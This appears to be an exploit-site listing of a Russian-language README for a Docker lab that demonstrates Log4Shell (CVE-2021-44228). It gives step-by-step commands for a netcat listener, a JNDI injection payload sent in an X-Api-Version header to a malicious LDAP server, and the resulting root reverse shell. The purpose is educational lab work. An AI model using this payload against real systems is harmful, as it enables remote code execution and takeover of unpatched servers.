Sploitus

Exploit for mi-laboratorio-log4shell

kitploit · 2026-08-31

Exploit Code

MARKDOWN102 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MAFO-SEC-MI-LABORATORIO-LOG4SHELL
# 🚀 Автоматизированная лаборатория Log4Shell (CVE-2021-44228) Play & Plug

Автоматизированная, однокомандная лаборатория для исследований безопасности, предназначенная для демонстрации и аудита уязвимости **Log4Shell (CVE-2021-44228)** удаленного выполнения кода (RCE).

Этот проект объединяет все необходимые компоненты (уязвимое приложение, вредоносный LDAP-сервер перенаправления и инструменты атакующего) в единую изолированную сетевую инфраструктуру с использованием Docker Compose.

* * *

## ⚙️ Ключевые особенности

  * **100% Plug & Play:** Не требуется ручная настройка IP, редактирование файла `.env` или согласование сети. Все разрешается автоматически через внутренний DNS Docker.
  * **Совместимость байт-кода:** Эксплойт-код автоматически кросс-компилируется для обеспечения совместимости с более старой архитектурой виртуальной машины Java (JVM) жертвы, устраняя проблемы `UnsupportedClassVersionError`.
  * **Централизованное развертывание:** Полностью управляется единым оркестрационным слоем и интерактивным менеджером Bash-скриптов (`configurar.sh`), который автоматизирует удаление контейнеров, очистку кэша и пересборку.



* * *

## 🏗️ Обзор архитектуры

Лаборатория создает изолированную мостовую сеть (`red-log4shell`) с тремя ключевыми участниками:

  1. **Жертва (`web-vulnerable`):** Веб-приложение Spring Boot, использующее непропатченную уязвимую версию Log4j (`2.14.1`) на **Java 8u111**.
  2. **LDAP-сервер (`ldap-malicioso`):** Работает на `marshalsec` для перехвата входящих запросов поиска и динамического перенаправления жертвы на нагрузку атакующего.
  3. **Атакующий (`kali-tools`):** Пользовательский контейнер Kali Linux, который размещает HTTP-сервер Python для доставки скомпилированной нагрузки эксплойта (`Exploit.class`) и слушатель Netcat для получения реверс-шелла.



* * *

## ⚙️ Быстрый запуск

Для развертывания этой лаборатории на любой Linux-машине с установленным Docker выполните следующие команды в терминале:

root@kitploit:~
    
    
    # 1. Clone the repository
    git clone https://github.com/MAFO-sec/mi-laboratorio-log4shell.git
    
    # 2. Navigate to the project directory
    cd mi-laboratorio-log4shell
    
    # 3. Grant execution permissions to the script manager and launch the lab
    chmod +x configurar.sh
    ./configurar.sh
    

* * *

🚀 Как провести эксплуатацию (пошагово)

Как только инфраструктура автоматически запустится с помощью скрипта, выполните следующие шаги, чтобы инициировать эксплойт и перехватить реверс-шелл.

Шаг 1: Настройка слушателя Netcat

Откройте новый терминал на вашей хост-машине (Ubuntu) и подключитесь к контейнеру атакующего, чтобы перевести Netcat в режим ожидания входящих подключений:

root@kitploit:~
    
    
    sudo docker exec -it kali-tools bash
    

Внутри контейнера Kali запустите слушатель:

root@kitploit:~
    
    
    nc -lvnp 4444
    

Вы увидите сообщение: listening on [any] 4444 ...

Шаг 2: Запуск вектора атаки

Откройте еще один отдельный терминал на хост-машине и отправьте вредоносную строку внедрения JNDI, встроенную в заголовок X-Api-Version:

root@kitploit:~
    
    
    curl http://localhost:8080/ -H 'X-Api-Version: ${jndi:ldap://ldap-malicioso:1389/Exploit}'
    

Шаг 3: Проверка реверс-шелла

Вернитесь к вашему терминалу Netcat. Вы должны увидеть активное соединение. Теперь вы можете выполнять команды от имени root внутри сервера-жертвы:

root@kitploit:~
    
    
    connect to [172.21.0.4] from (UNKNOWN) [172.21.0.2] 57164
    whoami
    root
    

* * *

## ⚠️ Отказ от ответственности

Этот репозиторий создан строго для **образовательных целей, исследований в области безопасности и авторизованного академического аудита**. Никогда не выполняйте эти инструменты или атаку на инфраструктуру без явного предварительного письменного разрешения владельцев инфраструктуры.